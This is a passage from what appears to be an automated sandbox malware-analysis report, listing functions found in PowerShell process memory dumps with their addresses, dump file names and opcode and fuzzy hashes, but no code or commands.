                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41110471F0E6884FEB93DB6854A0568BBE1EF2A314B1801BED94DD71C3DA29A844C311
                                                                                                                                                                                                                            Function 00007FFD345A0B44 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000C.00000002.2309227175.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 22ef35254ddc083b5fa6993006692d69ee041f28d3af76c4f7ce67c55e3313a7
                                                                                                                                                                                                                            • Instruction ID: e42063bdea366a251b3458220c9bfc358f5f7a46f7deb7dd177f045c42c16c60
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22ef35254ddc083b5fa6993006692d69ee041f28d3af76c4f7ce67c55e3313a7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2601B932F1EA4A4FE7DAAA5C64A517CB3D1EF8625575400BEE15DC21D3DD2EAC059200
                                                                                                                                                                                                                            Function 00007FFD344D4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000C.00000002.2308909075.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                            • Instruction ID: 90dfc4b8dc236ae19ed9faf4eae3c8d71998030ea7d500346e8466edc6007268
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7601A73020CB0C4FD744EF0CE051AA9B3E0FB99324F10052DE58AC36A5D736E882CB45

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 00007FFD344D6525 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000C.00000002.2308909075.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7e8a0190fb266865bc4c27be335c17dbccd4d243fa830f814f5ef0afea98be33
                                                                                                                                                                                                                            • Instruction ID: a1d315288ebc282f36624e45d4edfb597a2c07f8c34518d72a2dde916b0b75b5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e8a0190fb266865bc4c27be335c17dbccd4d243fa830f814f5ef0afea98be33
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29B1E653B0F6965BE751B66C68F92E63FE0EF53224B0A02F7C1C8CA0A7DD5C68069351

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00007FFD345909CD Relevance: .4, Instructions: 360COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 33c3e77be9e0f203a77bbc2b0596e5f84054978ab4b7410c1657c1f780cf179b
                                                                                                                                                                                                                            • Instruction ID: c81d1f3e72e9002cb09ab66aa0ff58882021c16b2c146b0cec2a158c6f268e65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33c3e77be9e0f203a77bbc2b0596e5f84054978ab4b7410c1657c1f780cf179b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92B10F23E0EBC90FE757962858B61A47FF1EF87620B0805EFD189CB0A3D9196846D352
                                                                                                                                                                                                                            Function 00007FFD34590B44 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: daa598a1c8a8347885540fe56fd6f3f97283270656e7efdb3f0e1f7bb122ed85
                                                                                                                                                                                                                            • Instruction ID: 03ab3a2eea50a5602e38b3059871b54b49a4a1359901233e6e9137d57c99115d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daa598a1c8a8347885540fe56fd6f3f97283270656e7efdb3f0e1f7bb122ed85
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0501B932F0DA464FE79AA65C64A517C73E2EF8675575404BAE14DC2593DE2DAC019200
                                                                                                                                                                                                                            Function 00007FFD344C4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000E.00000002.2424933577.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                            • Instruction ID: c5d6333bad849b6d43603653fee89adb54aa6a76a37498d0eb7699023f4e6eda
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501A73020CB0C4FD744EF0CE051AA5B3E0FB95324F10052DE58AC36A5DB36E881CB45
                                                                                                                                                                                                                            Function 00007FFD3459379A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000000E.00000002.2425573537.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5874ed30099697d4483c4a450b2456c463ed7d0e4eb121c4f8c11ba54552f61e
                                                                                                                                                                                                                            • Instruction ID: 0d6f93d92d415dea7b28e44fa4630ca0b4e4a01bbd439c9a64aea2f6f1e159ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5874ed30099697d4483c4a450b2456c463ed7d0e4eb121c4f8c11ba54552f61e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF0E532F0E6884FEB56EBBC54A01E8BBA0EB5A260F1801BFE14DD7183D8399845C351

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00007FFD345A073C Relevance: .4, Instructions: 426COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549943107.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f1e77cb12180917c9d877d173c509d00261be4f936bd61db1c851b98dad3488d
                                                                                                                                                                                                                            • Instruction ID: 7794ba6e12d6c5e507c65efee29feaeaaa203a2390849d435b64f44e9f9450ae
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1e77cb12180917c9d877d173c509d00261be4f936bd61db1c851b98dad3488d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09D1F422F1E7CA0FE7979B6858A51A47FE1EF57720B0801FBD189C71E3D91DA8468342
                                                                                                                                                                                                                            Function 00007FFD344D4196 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1c64f9c5ef59eac1480721a5499d6725b5c7ba8f446b9e7c3bda3e560e9f4e45
                                                                                                                                                                                                                            • Instruction ID: 59679e0dbbaa582bf65157c9f2be697c0ecd99dfd55d1364643391f7701e1671
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c64f9c5ef59eac1480721a5499d6725b5c7ba8f446b9e7c3bda3e560e9f4e45
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C019272B0CA180BE758994C78561BCB3D1E79A621F05023FE18EC3286DE69A8035286
                                                                                                                                                                                                                            Function 00007FFD344D4182 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4598ee3edf00ac0262d4078ae0fd92dfcf1591089475b79ae25ed7997e5de700
                                                                                                                                                                                                                            • Instruction ID: 6e8e90b878b8f591fd7fab9b6867498902cfc9b97a3a0d2a42dc112b06612460
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4598ee3edf00ac0262d4078ae0fd92dfcf1591089475b79ae25ed7997e5de700
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE019672B0CA180BE75C594C74521BC73D1E79A721F05027FE58EC3286DE5968435186
                                                                                                                                                                                                                            Function 00007FFD344D41A7 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a4442f86807928f54d37bcaaa4a5c521911d7acc26ff0cad7c0581ad2170df57
                                                                                                                                                                                                                            • Instruction ID: 31bf03a6402a69ce00e0ae189dd89edb4ded382b1448f8ad9b7bf1a7ad821831
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4442f86807928f54d37bcaaa4a5c521911d7acc26ff0cad7c0581ad2170df57
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A017572B0CA1C0BD75C594C78561B8B3D1E79A625F05037FE18ED3286DE29A8035686
                                                                                                                                                                                                                            Function 00007FFD345A346E Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549943107.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd345a0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 857432b7e91651cb8bf4b3a04837c7f186b9df249b2e98746e091a1cd5bd4c52
                                                                                                                                                                                                                            • Instruction ID: 75edc4bb2b5ba02b0f82c779ee1cfc2b669ea91ed0eac22859b18707011e1145
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 857432b7e91651cb8bf4b3a04837c7f186b9df249b2e98746e091a1cd5bd4c52
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11110821F0E7894FE7A7DA9850A81687BE1EF6A318B1401FED94DDB1C3DA2DA8048311
                                                                                                                                                                                                                            Function 00007FFD344D33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000010.00000002.2549159352.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffd344d0000_powershell.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                            • Instruction ID: f7f444066b098512b727a9001cb1ad15401c1905bfe25d9c57a8f0291b04063f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC01A73020CB0C4FD744EF0CE051AA5B3E0FB85324F10052DE58AC3661DB36E882CB45